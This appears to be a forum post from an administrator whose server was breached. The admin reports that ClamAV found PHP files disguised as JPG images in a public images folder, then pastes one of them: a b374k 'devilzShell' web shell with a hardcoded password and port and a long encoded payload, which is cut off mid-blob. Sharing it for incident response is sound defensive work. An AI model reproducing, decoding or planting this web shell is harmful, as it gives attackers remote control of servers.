4

so our Head of IT called me and told me someone sent him our server /etc/passwd content, and said this man has done sql injection on our server. So I checked each user history logs and found nothing, I am also check auth.log but nothing suspicious happened.

Then I installed clamav, scan all the directory using clamscan -r -i / , found these files:

/home/project/prod/project.api/public/images/rOIqOd1sz.jpg /home/project/prod/project.api/public/images/rOXmZ1Nsz.jpg

so basically they are images, but contains script, here is the script contents:

<?php
//
// devilzShell <[php]>
// ^^^^^^^^^^^^
// author: b374k
// greets: devilzc0der(s) and all of you who love peace and freedom
//
//
// ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
// Jayalah Indonesiaku


$shell_name = "Nadipa Luvchuterusz ~\ PERCAYA :) ";
$shell_fake_name = "root@Lvchtrzs:~\ Login ";
$shell_title = " ~/ ".$shell_name." \~";
$shell_version = "v2";
$shell_password = "riska";
$shell_fav_port = "12345";
$shell_color = "Black";
$shell_code = "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